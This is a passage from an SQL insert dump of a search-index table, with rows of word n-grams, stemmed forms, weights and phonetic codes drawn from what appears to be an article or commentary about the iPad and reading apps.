harsh',0,1,1.5667,'R362362',1,'en'),(17483,'review','review',0,0,0.4,'R100',1,'en'),(17484,'review my','review my',0,1,1.3,'R150',1,'en'),(17485,'review my actual','review my actual',0,1,1.5333,'R15234',1,'en'),(17486,'right','right',0,0,0.3333,'R230',4,'en'),(17487,'right for','right for',0,1,1.3,'R2316',1,'en'),(17488,'right for the','right for the',0,1,1.4333,'R23163',1,'en'),(17489,'right off','right off',0,1,1.3,'R231',1,'en'),(17490,'right off the','right off the',0,1,1.4333,'R2313',1,'en'),(17491,'round','round',0,0,0.3333,'R530',2,'en'),(17492,'round 1.apple','round 1.apple',0,1,1.4333,'R5314',1,'en'),(17493,'round 1.apple has','round 1.apple has',0,1,1.5667,'R53142',1,'en'),(17494,'run','run',0,0,0.2,'R500',3,'en'),(17495,'run a','run a',0,1,1.1667,'R500',1,'en'),(17496,'run a computer','run a computer',0,1,1.4667,'R525136',1,'en'),(17497,'safari','safari',0,0,0.4,'S160',2,'en'),(17498,'safari app','safari app',0,1,1.3333,'S161',1,'en'),(17499,'safari app even','safari app even',0,1,1.5,'S1615',1,'en'),(17500,'salary','salari',0,0,0.4,'S460',1,'en'),(17501,'salary tops','salari tops',0,1,1.3667,'S46312',1,'en'),(17502,'salary tops nation','salari tops nation',0,1,1.6,'S46312535',1,'en'),(17503,'savior','savior',0,0,0.4,'S160',1,'en'),(17504,'savior of','savior of',0,1,1.3,'S161',1,'en'),(17505,'savior of news','savior of news',0,1,1.4667,'S16152',1,'en'),(17506,'scattered','scatter',0,0,0.6,'S363',1,'en'),(17507,'scattered all','scatter all',0,1,1.4333,'S3634',1,'en'),(17508,'scattered all over','scatter all over',0,1,1.6,'S363416',1,'en'),(17509,'science','scienc',0,0,0.4667,'S520',1,'en'),(17510,'science made','scienc made',0,1,1.4,'S5253',1,'en'),(17511,'science made the','scienc made the',0,1,1.5333,'S5253',1,'en'),(17512,'screen i','screen i',0,1,1.2667,'S650',1,'en'),(17513,'screen i think','screen i think',0,1,1.4667,'S65352',1,'en'),(17514,'screen ibooks','screen ibooks',0,1,1.4333,'S6512',1,'en'),(17515,'screen ibooks comes','screen ibooks comes',0,1,1.6333,'S651252',1,'en'),(17516,'screen if','screen if',0,1,1.3,'S651',1,'en'),(17517,'screen if it\'s','screen if it',0,1,1.4667,'S65132',1,'en'),(17518,'screen marvel\'s','screen marvel',0,1,1.5,'S656142',1,'en'),(17519,'screen marvel\'s comics','screen marvel comics',0,1,1.7333,'S65614252',1,'en'),(17520,'screen or','screen or',0,1,1.3,'S656',1,'en'),(17521,'screen or the','screen or the',0,1,1.4333,'S6563',1,'en'),(17522,'screens and','screen and',0,1,1.3667,'S65253',1,'en'),(17523,'screens and delay','screen and delay',0,1,1.5667,'S652534',1,'en'),(17524,'screens exactly','screen exactly',0,1,1.5,'S65234',1,'en'),(17525,'screens exactly what','screen exactly what',0,1,1.6667,'S652343',1,'en'),(17526,'scroll','scroll',0,0,0.4,'S640',1,'en'),(17527,'scroll up','scroll up',0,1,1.3,'S641',1,'en'),(17528,'scroll up and','scroll up and',0,1,1.4333,'S64153',1,'en'),(17529,'seamlessly','seamlessli',0,0,0.6667,'S5424',1,'en'),(17530,'seamlessly then','seamlessli then',0,1,1.5,'S542435',1,'en'),(17531,'seamlessly then apps','seamlessli then apps',0,1,1.6667,'S54243512',1,'en'),(17532,'see','see',0,0,0.2,'S000',5,'en'),(17533,'see is','see is',0,1,1.2,'S000',1,'en'),(17534,'see is when','see is when',0,1,1.3667,'S500',1,'en'),(17535,'see when','see when',0,1,1.2667,'S500',1,'en'),(17536,'see when you','see when you',0,1,1.4,'S500',1,'en'),(17537,'seem','seem',0,0,0.2667,'S500',4,'en'),(17538,'seem to','seem to',0,1,1.2333,'S530',1,'en'),(17539,'seem to be','seem to be',0,1,1.3333,'S531',1,'en'),(17540,'seems','seem',0,0,0.3333,'S520',2,'en'),(17541,'seems surprised','seem surprised',0,1,1.5,'S5261623',1,'en'),(17542,'seems surprised this','seem surprised this',0,1,1.6667,'S52616232',1,'en'),(17543,'sell','sell',0,0,0.2667,'S400',1,'en'),(17544,'sell prospective','sell prospective',0,1,1.5333,'S41621231',1,'en'),(17545,'sell prospective buyers','sell prospective buyers',0,1,1.7667,'S4162123162',1,'en'),(17546,'shift','shift',0,0,0.3333,'S130',1,'en'),(17547,'shift favoring','shift favoring',0,1,1.4667,'S131652',1,'en'),(17548,'shift favoring the','shift favoring the',0,1,1.6,'S1316523',1,'en'),(17549,'shiny','shini',0,0,0.3333,'S500',1,'en'),(17550,'shiny black','shini black',0,1,1.3667,'S5142',1,'en'),(17551,'shiny black screen','shini black screen',0,1,1.6,'S514265',1,'en'),(17552,'should','should',1,0,0.05,'S430',5,'en'),(17553,'should do','should do',0,1,1.3,'S430',1,'en'),(17554,'should do a','should do a',0,1,1.3667,'S430',1,'en'),(17555,'should just','should just',0,1,1.3667,'S4323',1,'en'),(17556,'should just type','should just type',0,1,1.5333,'S43231',1,'en'),(17557,'should stop','should stop',0,1,1.3667,'S43231',1,'en'),(17558,'should stop pay','should stop pay',0,1,1.5,'S43231',1,'en'),(17559,'show','show',0,0,0.2667,'S000',5,'en'),(17560,'show off','show off',0,1,1.2667,'S100',3,'en'),(17561,'show off the','show off the',0,1,1.4,'S130',1,'en'),(17562,'silly','silli',0,0,0.3333,'S400',1,'en'),(17563,'silly face','silli face',0,1,1.3333,'S412',1,'en'),(17564,'silly face you','silli face you',0,1,1.4667,'S412',1,'en'),(17565,'similar','similar',0,0,0.4667,'S546',2,'en'),(17566,'similar to','similar to',0,1,1.3333,'S5463',1,'en'),(17567,'similar to old','similar to old',0,1,1.4667,'S546343',1,'en'),(17568,'sized','size',0,0,0.3333,'S300',2,'en'),(17569,'sized right','size right',0,1,1.3667,'S3623',1,'en'),(17570,'sized right for','size right for',0,1,1.5,'S362316',1,'en'),(17571,'sizemonotasking','sizemonotask',0,0,1,'S53252',1,'en'),(17572,'sizemonotasking you','sizemonotask you',0,1,1.6333,'S53252',1,'en'),(17573,'sizemonotasking you can','sizemonotask you can',0,1,1.7667,'S532525',1,'en'),(17574,'sizethe','sizeth',0,0,0.4667,'S300',1,'en'),(17575,'sizethe new','sizeth new',0,1,1.3667,'S350',1,'en'),(17576,'sizethe new york','sizeth new york',0,1,1.5333,'S3562',1,'en'),(17577,'slowly','slowli',0,0,0.4,'S400',1,'en'),(17578,'slowly appear','slowli appear',0,1,1.4333,'S416',1,'en'),(17579,'slowly appear then','slowli appear then',0,1,1.6,'S41635',1,'en'),(17580,'so active','so active',0,1,1.3,'S310',1,'en'),(17581,'so active pages','so active pages',0,1,1.5,'S312',1,'en'),(17582,'so fast','so fast',0,1,1.2333,'S123',1,'en'),(17583,'so fast inside','so fast inside',0,1,1.4667,'S123523',1,'en'),(17584,'so fast via','so fast via',0,1,1.3667,'S1231',1,'en'),(17585,'so quickly','so quickly',0,1,1.3333,'S400',1,'en'),(17586,'so quickly you','so quickly you',0,1,1.4667,'S400',1,'en'),(17587,'solution for','solut for',0,1,1.4,'S43516',1,'en'),(17588,'solution for touch','solut for touch',0,1,1.6,'S4351632',1,'en'),(17589,'some','some',1,0,0.0333,'S500',7,'en'),(17590,'some apps','some apps',0,1,1.3,'S512',1,'en'),(17591,'some apps are','some apps are',0,1,1.4333,'S5126',1,'en'),(17592,'some individuals','some individuals',0,1,1.5333,'S531342',1,'en'),(17593,'some individuals ask','some individuals ask',0,1,1.6667,'S531342',1,'en'),(17594,'some iphone\'s','some iphone',0,1,1.4333,'S5152',1,'en'),(17595,'some iphone\'s obscure','some iphone obscure',0,1,1.7,'S5152126',1,'en'),(17596,'some stuff','some stuff',0,1,1.3333,'S5231',1,'en'),(17597,'some stuff that\'s','some stuff that',0,1,1.5667,'S523132',1,'en'),(17598,'some things','some things',0,1,1.3667,'S5352',1,'en'),(17599,'some things just','some things just',0,1,1.5333,'S53523',1,'en'),(17600,'something','someth',0,0,0.6,'S5352',4,'en'),(17601,'something pleased','someth pleased',0,1,1.5667,'S53521423',1,'en'),(17602,'something pleased in','someth pleased in',0,1,1.6667,'S535214235',1,'en'),(17603,'sound','sound',0,0,0.3333,'S530',2,'en'),(17604,'sound similar','sound similar',0,1,1.4333,'S532546',1,'en'),(17605,'sound similar to','sound similar to',0,1,1.5333,'S5325463',1,'en'),(17606,'sources','sourc',0,0,0.4667,'S620',1,'en'),(17607,'sources as','sourc as',0,1,1.3333,'S620',1,'en'),(17608,'sources as apps','sourc as apps',0,1,1.5,'S6212',1,'en'),(17609,'speed','speed',0,0,0.3333,'S130',2,'en'),(17610,'speed up','speed up',0,1,1.2667,'S131',1,'en'),(17611,'speed up this','speed up this',0,1,1.4333,'S13132',1,'en'),(17612,'spite','spite',0,0,0.3333,'S130',1,'en'),(17613,'spite of','spite of',0,1,1.2667,'S131',1,'en'),(17614,'spite of the','spite of the',0,1,1.4,'S1313',1,'en'),(17615,'stand','stand',0,0,0.3333,'S353',1,'en'),(17616,'stand anyway','stand anyway',0,1,1.4,'S3535',1,'en'),(17617,'stand anyway resting','stand anyway resting',0,1,1.6667,'S353562352',1,'en'),(17618,'standing','stand',0,0,0.5333,'S35352',1,'en'),(17619,'standing up','stand up',0,1,1.3667,'S353521',1,'en'),(17620,'standing up when','stand up when',0,1,1.5333,'S3535215',1,'en'),(17621,'stare','stare',0,0,0.3333,'S360',1,'en'),(17622,'stare and','stare and',0,1,1.3,'S3653',1,'en'),(17623,'stare and to','stare and to',0,1,1.4,'S3653',1,'en'),(17624,'stares','stare',0,0,0.4,'S362',1,'en'),(17625,'stares into','stare into',0,1,1.3667,'S36253',1,'en'),(17626,'stares into you','stare into you',0,1,1.5,'S36253',1,'en'),(17627,'start','start',0,0,0.3333,'S363',5,'en'),(17628,'start if','start if',0,1,1.2667,'S3631',1,'en'),(17629,'start if you','start if you',0,1,1.4,'S3631',1,'en'),(17630,'start up','start up',0,1,1.2667,'S3631',1,'en'),(17631,'start up chime','start up chime',0,1,1.4667,'S363125',1,'en'),(17632,'static','static',0,0,0.4,'S320',1,'en'),(17633,'static print','static print',0,1,1.4,'S321653',1,'en'),(17634,'static print pages','static print pages',0,1,1.6,'S32165312',1,'en'),(17635,'steve','steve',0,0,0.3333,'S310',2,'en'),(17636,'steve jobs','steve jobs',0,1,1.3333,'S31212',2,'en'),(17637,'steve jobs i','steve jobs i',0,1,1.4,'S31212',1,'en'),(17638,'still','still',0,0,0.3333,'S340',2,'en'),(17639,'still be','still be',0,1,1.2667,'S341',1,'en'),(17640,'still be chiming','still be chiming',0,1,1.5333,'S341252',1,'en'),(17641,'still makes','still makes',0,1,1.3667,'S3452',1,'en'),(17642,'still makes desktop','still makes desktop',0,1,1.6333,'S34523231',1,'en'),(17643,'still makes desktops','still makes desktops',0,1,1.6667,'S345232312',1,'en'),(17644,'still not','still not',0,1,1.3,'S3453',1,'en'),(17645,'still not paste','still not paste',0,1,1.5,'S3453123',1,'en'),(17646,'stop','stop',0,0,0.2667,'S310',2,'en'),(17647,'stop pay','stop pay',0,1,1.2667,'S310',1,'en'),(17648,'stop pay pandora','stop pay pandora',0,1,1.5333,'S31536',1,'en'),(17649,'store','store',0,0,0.3333,'S360',5,'en'),(17650,'store popular','store popular',0,1,1.4333,'S36146',1,'en'),(17651,'store popular science','store popular science',0,1,1.7,'S36146252',1,'en'),(17652,'stories','stori',0,0,0.4667,'S362',1,'en'),(17653,'stories presented','stori presented',0,1,1.5667,'S36216253',1,'en'),(17654,'stories presented like','stori presented like',0,1,1.7333,'S3621625342',1,'en'),(17655,'stuff','stuff',0,0,0.3333,'S310',2,'en'),(17656,'stuff that\'s','stuff that',0,1,1.4,'S3132',1,'en'),(17657,'stuff that\'s the','stuff that the',0,1,1.5333,'S31323',1,'en'),(17658,'stunning','stun',0,0,0.5333,'S352',1,'en'),(17659,'stunning color','stun color',0,1,1.4667,'S35246',1,'en'),(17660,'stunning color but','stun color but',0,1,1.6,'S3524613',1,'en'),(17661,'suffer','suffer',0,0,0.4,'S160',1,'en'),(17662,'suffer is','suffer is',0,1,1.3,'S162',1,'en'),(17663,'suffer is as','suffer is as',0,1,1.4,'S162',1,'en'),(17664,'suite','suit',0,0,0.3333,'S300',1,'en'),(17665,'suite and','suit and',0,1,1.3,'S353',1,'en'),(17666,'suite and it\'s','suit and it',0,1,1.4667,'S3532',1,'en'),(17667,'suited','suit',0,0,0.4,'S300',1,'en'),(17668,'suited for','suit for',0,1,1.3333,'S316',1,'en'),(17669,'suited for your','suit for your',0,1,1.5,'S316',1,'en'),(17670,'summarized','summar',0,0,0.6667,'S5623',1,'en'),(17671,'summarized as','summar as',0,1,1.4333,'S56232',1,'en'),(17672,'summarized as a','summar as a',0,1,1.5,'S56232',1,'en'),(17673,'surprised','surpris',0,0,0.6,'S61623',2,'en'),(17674,'surprised this','surpris this',0,1,1.4667,'S616232',1,'en'),(17675,'surprised this morning','surpris this morning',0,1,1.7333,'S6162325652',1,'en'),(17676,'sweep','sweep',0,0,0.3333,'S100',1,'en'),(17677,'sweep to','sweep to',0,1,1.2667,'S130',1,'en'),(17678,'sweep to and','sweep to and',0,1,1.4,'S1353',1,'en'),(17679,'sweeping','sweep',0,0,0.5333,'S152',1,'en'),(17680,'sweeping zipping','sweep zipping',0,1,1.5333,'S152152',1,'en'),(17681,'sweeping zipping and','sweep zipping and',0,1,1.6667,'S15215253',1,'en'),(17682,'symbol mode','symbol mode',0,1,1.3667,'S51453',1,'en'),(17683,'symbol mode i','symbol mode i',0,1,1.4333,'S51453',1,'en'),(17684,'system is','system is',0,1,1.3,'S352',1,'en'),(17685,'system is not','system is not',0,1,1.4333,'S35253',1,'en'),(17686,'table','tabl',0,0,0.3333,'T140',2,'en'),(17687,'table i','tabl i',0,1,1.2333,'T140',1,'en'),(17688,'table i was','tabl i was',0,1,1.3667,'T142',1,'en'),(17689,'tablet in','tablet in',0,1,1.3,'T1435',1,'en'),(17690,'tablet in family','tablet in family',0,1,1.5333,'T1435154',1,'en'),(17691,'take on','take on',0,1,1.2333,'T250',1,'en'),(17692,'take on that','take on that',0,1,1.4,'T253',1,'en'),(17693,'taking','take',0,0,0.4,'T252',3,'en'),(17694,'taking a','take a',0,1,1.2667,'T252',1,'en'),(17695,'taking a stand','take a stand',0,1,1.4667,'T252353',1,'en'),(17696,'tap','tap',0,0,0.2,'T100',1,'en'),(17697,'tap and','tap and',0,1,1.2333,'T153',1,'en'),(17698,'tap and you','tap and you',0,1,1.3667,'T153',1,'en'),(17699,'tasking','task',0,0,0.4667,'T252',1,'en'),(17700,'tasking one','task one',0,1,1.3667,'T2525',1,'en'),(17701,'tasking one way','task one way',0,1,1.5,'T2525',1,'en'),(17702,'teachers\'','teacher',0,0,0.6,'T262',1,'en'),(17703,'teachers\' average','teacher average',0,1,1.5667,'T262162',1,'en'),(17704,'teachers\' average salary','teacher average salary',0,1,1.8,'T26216246',1,'en'),(17705,'techies','techi',0,0,0.4667,'T200',1,'en'),(17706,'techies are','techi are',0,1,1.3667,'T260',1,'en'),(17707,'techies are generally','techi are generally',0,1,1.7,'T262564',1,'en'),(17708,'text','text',0,0,0.2667,'T230',1,'en'),(17709,'text and','text and',0,1,1.2667,'T2353',1,'en'),(17710,'text and all','text and all',0,1,1.4,'T23534',1,'en'),(17711,'than cramped','than cramped',0,1,1.4,'T526513',1,'en'),(17712,'than cramped physical','than cramped physical',0,1,1.7,'T526513124',1,'en'),(17713,'that all','that all',0,1,1.2667,'T400',1,'en'),(17714,'that all of','that all of',0,1,1.3667,'T410',1,'en'),(17715,'that did','that did',0,1,1.2667,'T000',1,'en'),(17716,'that did not','that did not',0,1,1.4,'T530',1,'en'),(17717,'that i','that i',0,1,1.2,'T000',3,'en'),(17718,'that i expected','that i expected',0,1,1.5,'T2123',1,'en'),(17719,'that i\'ll','that i',0,1,1.3,'T400',1,'en'),(17720,'that i\'ll mostly','that i mostly',0,1,1.5333,'T45234',1,'en'),(17721,'that is a','that is a',0,1,1.3,'T200',1,'en'),(17722,'that scroll','that scroll',0,1,1.3667,'T264',1,'en'),(17723,'that scroll up','that scroll up',0,1,1.4667,'T2641',1,'en'),(17724,'that the','that the',0,1,1.2667,'T000',5,'en'),(17725,'that the ipad','that the ipad',0,1,1.4333,'T130',1,'en'),(17726,'that they','that they',0,1,1.3,'T000',3,'en'),(17727,'that they should','that they should',0,1,1.5333,'T243',1,'en'),(17728,'that to','that to',0,1,1.2333,'T000',1,'en'),(17729,'that to feel','that to feel',0,1,1.4,'T140',1,'en'),(17730,'that while','that while',0,1,1.3333,'T400',1,'en'),(17731,'that while jeff','that while jeff',0,1,1.5,'T421',1,'en'),(17732,'that you','that you',0,1,1.2667,'T000',3,'en'),(17733,'that you can','that you can',0,1,1.4,'T250',2,'en'),(17734,'that\'s an','that an',0,1,1.3,'T250',1,'en'),(17735,'that\'s an underrated','that an underrated',0,1,1.6667,'T25363',1,'en'),(17736,'that\'s the','that the',0,1,1.3333,'T230',1,'en'),(17737,'that\'s the ipad\'s','that the ipad',0,1,1.5667,'T23132',1,'en'),(17738,'the angle','the angle',0,1,1.3,'T524',1,'en'),(17739,'the angle would','the angle would',0,1,1.5,'T5243',1,'en'),(17740,'the app','the app',0,1,1.2333,'T100',1,'en'),(17741,'the app store','the app store',0,1,1.4333,'T1236',1,'en'),(17742,'the apple','the apple',0,1,1.3,'T140',1,'en'),(17743,'the apple apple','the apple apple',0,1,1.5,'T1414',1,'en'),(17744,'the bat','the bat',0,1,1.2333,'T130',1,'en'),(17745,'the bat you','the bat you',0,1,1.3667,'T130',1,'en'),(17746,'the best','the best',0,1,1.2667,'T123',4,'en'),(17747,'the best do','the best do',0,1,1.3667,'T123',1,'en'),(17748,'the changer','the changer',0,1,1.3667,'T2526',1,'en'),(17749,'the changer of','the changer of',0,1,1.4667,'T25261',1,'en'),(17750,'the coffee','the coffee',0,1,1.3333,'T210',1,'en'),(17751,'the coffee table','the coffee table',0,1,1.5333,'T21314',1,'en'),(17752,'the cost wait','the cost wait',0,1,1.4333,'T230',1,'en'),(17753,'the destroyer','the destroyer',0,1,1.4333,'T236',1,'en'),(17754,'the destroyer of','the destroyer of',0,1,1.5333,'T2361',1,'en'),(17755,'the e','the e',0,1,1.1667,'T000',2,'en'),(17756,'the e reader','the e reader',0,1,1.4,'T636',1,'en'),(17757,'the floppy','the floppy',0,1,1.3333,'T141',1,'en'),(17758,'the floppy disk','the floppy disk',0,1,1.5,'T14132',1,'en'),(17759,'the following few','the following few',0,1,1.5667,'T14521',1,'en'),(17760,'the game','the game',0,1,1.2667,'T250',1,'en'),(17761,'the game phone','the game phone',0,1,1.4667,'T2515',1,'en'),(17762,'the ideological','the ideological',0,1,1.5,'T424',1,'en'),(17763,'the ideological debate','the ideological debate',0,1,1.7333,'T424313',1,'en'),(17764,'the internet','the internet',0,1,1.4,'T53653',1,'en'),(17765,'the internet yet','the internet yet',0,1,1.5333,'T53653',1,'en'),(17766,'the ipad','the ipad',0,1,1.2667,'T130',2,'en'),(17767,'the ipad can','the ipad can',0,1,1.4,'T1325',1,'en'),(17768,'the ipad is','the ipad is',0,1,1.3667,'T132',1,'en'),(17769,'the ipad screen','the ipad screen',0,1,1.5,'T13265',1,'en'),(17770,'the ipad that','the ipad that',0,1,1.4333,'T130',1,'en'),(17771,'the ipad uses','the ipad uses',0,1,1.4333,'T132',1,'en'),(17772,'the ipad\'s','the ipad',0,1,1.3333,'T132',1,'en'),(17773,'the ipad\'s biggest','the ipad biggest',0,1,1.6,'T132123',1,'en'),(17774,'the ipad\'s touchscreen','the ipad touchscreen',0,1,1.7333,'T1323265',1,'en'),(17775,'the knees','the knees',0,1,1.3,'T252',1,'en'),(17776,'the knees up','the knees up',0,1,1.4,'T2521',1,'en'),(17777,'the lack','the lack',0,1,1.2667,'T420',1,'en'),(17778,'the lack of','the lack of',0,1,1.3667,'T421',1,'en'),(17779,'the launch','the launch',0,1,1.3333,'T452',1,'en'),(17780,'the launch i','the launch i',0,1,1.4,'T452',1,'en'),(17781,'the most','the most',0,1,1.2667,'T523',3,'en'),(17782,'the most of','the most of',0,1,1.3667,'T5231',1,'en'),(17783,'the other','the other',0,1,1.3,'T600',2,'en'),(17784,'the other way','the other way',0,1,1.4333,'T600',1,'en'),(17785,'the particular','the particular',0,1,1.4667,'T163246',3,'en'),(17786,'the particular take','the particular take',0,1,1.6333,'T16324632',1,'en'),(17787,'the pc','the pc',0,1,1.2,'T120',2,'en'),(17788,'the pc among','the pc among',0,1,1.4,'T1252',1,'en'),(17789,'the reading','the reading',0,1,1.3667,'T6352',1,'en'),(17790,'the reading suffer','the reading suffer',0,1,1.6,'T635216',1,'en'),(17791,'the right','the right',0,1,1.3,'T623',2,'en'),(17792,'the right off','the right off',0,1,1.4333,'T6231',1,'en'),(17793,'the safari','the safari',0,1,1.3333,'T216',1,'en'),(17794,'the safari app','the safari app',0,1,1.4667,'T2161',1,'en'),(17795,'the screen','the screen',0,1,1.3333,'T265',1,'en'),(17796,'the screen i','the screen i',0,1,1.4,'T265',1,'en'),(17797,'the shiny','the shiny',0,1,1.3,'T250',1,'en'),(17798,'the shiny black','the shiny black',0,1,1.5,'T25142',1,'en'),(17799,'the start','the start',0,1,1.3,'T2363',1,'en'),(17800,'the start up','the start up',0,1,1.4,'T23631',1,'en'),(17801,'the tablet','the tablet',0,1,1.3333,'T143',1,'en'),(17802,'the tablet in','the tablet in',0,1,1.4333,'T1435',1,'en'),(17803,'the text','the text',0,1,1.2667,'T230',1,'en'),(17804,'the text and','the text and',0,1,1.4,'T2353',1,'en'),(17805,'the this','the this',0,1,1.2667,'T200',1,'en'),(17806,'the this changes','the this changes',0,1,1.5333,'T252',1,'en'),(17807,'the touch','the touch',0,1,1.3,'T200',1,'en'),(17808,'the touch pads','the touch pads',0,1,1.4667,'T2132',1,'en'),(17809,'the use','the use',0,1,1.2333,'T200',3,'en'),(17810,'the use of','the use of',0,1,1.3333,'T210',3,'en'),(17811,'the whiz','the whiz',0,1,1.2667,'T200',1,'en'),(17812,'the whiz bang','the whiz bang',0,1,1.4333,'T2152',1,'en'),(17813,'the world-wide-web','the world-wide-web',0,1,1.6,'T6431',1,'en'),(17814,'the world-wide-web is','the world-wide-web is',0,1,1.7,'T64312',1,'en'),(17815,'their feet','their feet',0,1,1.3333,'T613',1,'en'),(17816,'their feet on','their feet on',0,1,1.4333,'T6135',1,'en'),(17817,'them down','them down',0,1,1.3,'T535',1,'en'),(17818,'them down is','them down is',0,1,1.4,'T5352',1,'en'),(17819,'them down refuses','them down refuses',0,1,1.5667,'T535612',1,'en'),(17820,'then apps','then apps',0,1,1.3,'T512',1,'en'),(17821,'then apps for','then apps for',0,1,1.4333,'T51216',1,'en'),(17822,'then messages','then messages',0,1,1.4333,'T520',1,'en'),(17823,'then messages about','then messages about',0,1,1.6333,'T5213',1,'en'),(17824,'then you\'d','then you',0,1,1.3333,'T530',1,'en'),(17825,'then you\'d have','then you have',0,1,1.5,'T531',1,'en'),(17826,'there','there',1,0,0.0417,'T600',8,'en'),(17827,'there is','there is',0,1,1.2667,'T620',3,'en'),(17828,'there is however','there is however',0,1,1.5333,'T6216',1,'en'),(17829,'they','thei',1,0,0.0333,'T000',9,'en'),(17830,'they can','thei can',0,1,1.2667,'T250',1,'en'),(17831,'they can check','thei can check',0,1,1.4667,'T252',1,'en'),(17832,'they should','thei should',0,1,1.3667,'T243',1,'en'),(17833,'they should stop','thei should stop',0,1,1.5333,'T243231',1,'en'),(17834,'they sound','thei sound',0,1,1.3333,'T253',1,'en'),(17835,'they sound similar','thei sound similar',0,1,1.6,'T2532546',1,'en'),(17836,'thing','thing',0,0,0.3333,'T520',6,'en'),(17837,'thing i','thing i',0,1,1.2333,'T520',1,'en'),(17838,'thing i noticed','thing i noticed',0,1,1.5,'T525323',1,'en'),(17839,'things','thing',0,0,0.4,'T520',8,'en'),(17840,'things just','thing just',0,1,1.3667,'T523',1,'en'),(17841,'things just don\'t','thing just don',0,1,1.5667,'T52353',1,'en'),(17842,'think','think',0,0,0.3333,'T520',6,'en'),(17843,'think i\'d','think i',0,1,1.3,'T523',1,'en'),(17844,'think i\'d rather','think i rather',0,1,1.5333,'T523636',1,'en'),(17845,'thinking','think',0,0,0.5333,'T5252',3,'en'),(17846,'thinking about','think about',0,1,1.4667,'T525213',3,'en'),(17847,'thinking about computers','think about computers',0,1,1.8,'T525213251362',1,'en'),(17848,'this can','thi can',0,1,1.2667,'T250',1,'en'),(17849,'this can be','thi can be',0,1,1.3667,'T251',1,'en'),(17850,'this category','thi category',0,1,1.4333,'T2326',1,'en'),(17851,'this category npr','thi category npr',0,1,1.5667,'T2326516',1,'en'),(17852,'this changes','thi changes',0,1,1.4,'T252',1,'en'),(17853,'this changes everything','thi changes everything',0,1,1.7667,'T25216352',1,'en'),(17854,'this morning','thi morning',0,1,1.4,'T25652',1,'en'),(17855,'this morning to','thi morning to',0,1,1.5,'T256523',1,'en'),(17856,'this out','thi out',0,1,1.2667,'T230',1,'en'),(17857,'this out month\'s','thi out month',0,1,1.5333,'T23532',1,'en'),(17858,'this sweeping','thi sweeping',0,1,1.4333,'T2152',1,'en'),(17859,'this sweeping zipping','thi sweeping zipping',0,1,1.7,'T2152152',1,'en'),(17860,'this was','thi was',0,1,1.2667,'T200',1,'en'),(17861,'this was not','thi was not',0,1,1.4,'T253',1,'en'),(17862,'this way','thi way',0,1,1.2667,'T200',1,'en'),(17863,'this way but','thi way but',0,1,1.4,'T213',1,'en'),(17864,'those ask','those ask',0,1,1.3,'T200',1,'en'),(17865,'those ask the','those ask the',0,1,1.4333,'T230',1,'en'),(17866,'thumbs','thumb',0,0,0.4,'T512',1,'en'),(17867,'thumbs as','thumb as',0,1,1.3,'T512',1,'en'),(17868,'thumbs as possibly','thumb as possibly',0,1,1.6,'T5121214',1,'en'),(17869,'thumbs you','thumb you',0,1,1.3333,'T512',1,'en'),(17870,'thumbs you would','thumb you would',0,1,1.5333,'T51243',1,'en'),(17871,'time waiting','time waiting',0,1,1.4,'T5352',1,'en'),(17872,'time waiting for','time waiting for',0,1,1.5333,'T535216',1,'en'),(17873,'times','time',1,0,0.0417,'T520',4,'en'),(17874,'times app','time app',0,1,1.3,'T521',1,'en'),(17875,'times app was','time app was',0,1,1.4333,'T5212',1,'en'),(17876,'to adjust','to adjust',0,1,1.3,'T230',1,'en'),(17877,'to adjust to','to adjust to',0,1,1.4,'T230',1,'en'),(17878,'to and','to and',0,1,1.2,'T530',1,'en'),(17879,'to and fro','to and fro',0,1,1.3333,'T5316',1,'en'),(17880,'to app','to app',0,1,1.2,'T100',1,'en'),(17881,'to app so','to app so',0,1,1.3,'T120',1,'en'),(17882,'to be sized','to be sized',0,1,1.3667,'T123',1,'en'),(17883,'to check your','to check your',0,1,1.4333,'T260',1,'en'),(17884,'to come','to come',0,1,1.2333,'T250',3,'en'),(17885,'to come to','to come to',0,1,1.3333,'T253',1,'en'),(17886,'to courtstate','to courtstate',0,1,1.4333,'T26323',1,'en'),(17887,'to courtstate trooper','to courtstate trooper',0,1,1.7,'T26323616',1,'en'),(17888,'to employ','to employ',0,1,1.3,'T514',1,'en'),(17889,'to employ word','to employ word',0,1,1.4667,'T51463',1,'en'),(17890,'to feel','to feel',0,1,1.2333,'T140',1,'en'),(17891,'to feel of','to feel of',0,1,1.3333,'T141',1,'en'),(17892,'to find','to find',0,1,1.2333,'T153',2,'en'),(17893,'to find that','to find that',0,1,1.4,'T153',1,'en'),(17894,'to let','to let',0,1,1.2,'T430',1,'en'),(17895,'to let you','to let you',0,1,1.3333,'T430',1,'en'),(17896,'to listen','to listen',0,1,1.3,'T4235',1,'en'),(17897,'to listen to','to listen to',0,1,1.4,'T42353',1,'en'),(17898,'to loose','to loose',0,1,1.2667,'T420',1,'en'),(17899,'to loose time','to loose time',0,1,1.4333,'T4235',1,'en'),(17900,'to move','to move',0,1,1.2333,'T510',1,'en'),(17901,'to move that','to move that',0,1,1.4,'T513',1,'en'),(17902,'to old','to old',0,1,1.2,'T430',1,'en'),(17903,'to old media','to old media',0,1,1.4,'T4353',1,'en'),(17904,'to pandora','to pandora',0,1,1.3333,'T1536',1,'en'),(17905,'to pandora npr','to pandora npr',0,1,1.4667,'T1536516',1,'en'),(17906,'to pay','to pay',0,1,1.2,'T100',1,'en'),(17907,'to pay for','to pay for',0,1,1.3333,'T160',1,'en'),(17908,'to personal','to personal',0,1,1.3667,'T16254',1,'en'),(17909,'to personal computers','to personal computers',0,1,1.7,'T16254251362',1,'en'),(17910,'to read','to read',0,1,1.2333,'T630',1,'en'),(17911,'to read the','to read the',0,1,1.3667,'T630',1,'en'),(17912,'to run','to run',0,1,1.2,'T650',2,'en'),(17913,'to run a','to run a',0,1,1.2667,'T650',1,'en'),(17914,'to sell','to sell',0,1,1.2333,'T240',1,'en'),(17915,'to sell prospective','to sell prospective',0,1,1.6333,'T241621231',1,'en'),(17916,'to show','to show',0,1,1.2333,'T200',1,'en'),(17917,'to show off','to show off',0,1,1.3667,'T210',1,'en'),(17918,'to slowly','to slowly',0,1,1.3,'T240',1,'en'),(17919,'to slowly appear','to slowly appear',0,1,1.5333,'T2416',1,'en'),(17920,'to the floppy','to the floppy',0,1,1.4333,'T141',1,'en'),(17921,'to the internet','to the internet',0,1,1.5,'T53653',1,'en'),(17922,'to the pc','to the pc',0,1,1.3,'T120',1,'en'),(17923,'to the touch','to the touch',0,1,1.4,'T200',1,'en'),(17924,'to type','to type',0,1,1.2333,'T100',1,'en'),(17925,'to type on','to type on',0,1,1.3333,'T150',1,'en'),(17926,'to use','to use',0,1,1.2,'T200',3,'en'),(17927,'to use to','to use to',0,1,1.3,'T230',1,'en'),(17928,'to witness','to 